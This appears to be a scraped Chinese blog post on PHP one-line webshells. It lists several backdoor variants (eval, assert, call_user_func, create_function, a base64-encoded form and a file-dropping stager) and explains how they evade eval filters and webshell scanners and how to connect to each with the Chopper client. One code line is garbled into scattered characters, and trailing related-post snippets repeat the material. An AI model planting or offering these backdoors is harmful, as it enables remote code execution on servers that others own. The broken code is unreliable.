php一句話猥瑣流搞法

2021-09-24 11:17:43 字數 1142 閱讀 5142

在滲透中常常遇到攔截eval的,所以

<?php eval($_post[xiao])?>這種形式的會被攔截

常見的是變成

base64_decode(pd9wahagzxzhbcgkx1bpu1rbeglhb10ppz4=)

這種形式可以繞過,另外還有其他形式

<?php $_get['eval']($_post['xiao']);?>

今天見一比較怪的東西:web防毒。v1.0。點。心想是不是誰有跟雲扯上了。

完了才知道是個webshell掃瞄工具。各位前輩把web後門弄的死去活來的,揍是怕人發現,壓縮,加密,字元逆轉,一句話,很爛了。

前段時間cnqing的blog上也發了乙個:

不少人討論了,也有人跟我的感覺一樣,php的後門不好杜絕。其實關鍵在於規則。再主動的掃瞄也是按照既定的規則進行的。

我也發乙個,屬於猥瑣流的。

if(key(get

)==′

sing

yea′

)cal

luse

rfun

c(

_get)=='singyea')call_user_func(

g​et)=

=′si

ngye

a′)c

allu

​ser

f​un

c(_get[『singyea』],$_post[『singyea』]);

好了。使用方法:

/shell.php?singyea=assert

客戶端用菜刀

<?php $_get['a']($_post['b']);?>

test.php?a=assert

密碼b<?php assert($_post[s]);?> <?php $_post['iso']($_post['cmd']);?>

密碼cmd 菜刀配置資訊填:iso=assert

<?php $s = create_function('', $_request['c']); $s(); // s.php?c=eval%28$_request[cmd]%29;&cmd=echo%201; ?> <?php file_put_contents(base64_decode(檔名), base64_decode(小馬base64));?>

php一句話猥瑣流搞法

在滲透中常常遇到攔截eval的,所以 這種形式的會被攔截 常見的是變成 base64 decode pd9wahagzxzhbcgkx1bpu1rbeglhb10ppz4 這種形式可以繞過,另外還有其他形式 今天見一比較怪的東西 web 防毒。v1.0。點。心想是不是誰有跟雲扯上了。完了才知道是個w...

php一句話猥瑣流搞法

在滲透中常常遇到攔截eval的,所以 這種形式的會被攔截 常見的是變成 base64 decode pd9wahagzxzhbcgkx1bpu1rbeglhb10ppz4 這種形式可以繞過,另外還有其他形式 今天見一比較怪的東西 web防毒。v1.0。點。心想是不是誰有跟雲扯上了。完了才知道是個we...

mysql 匯出一句話 MySQL 匯出一句話

drop table if exists temp 如果存在temp就刪掉 create table temp cmd text not null 建立temp表,裡面就乙個cmd欄位 insert into temp cmd values php eval post cmd 把一句話木馬插入到te...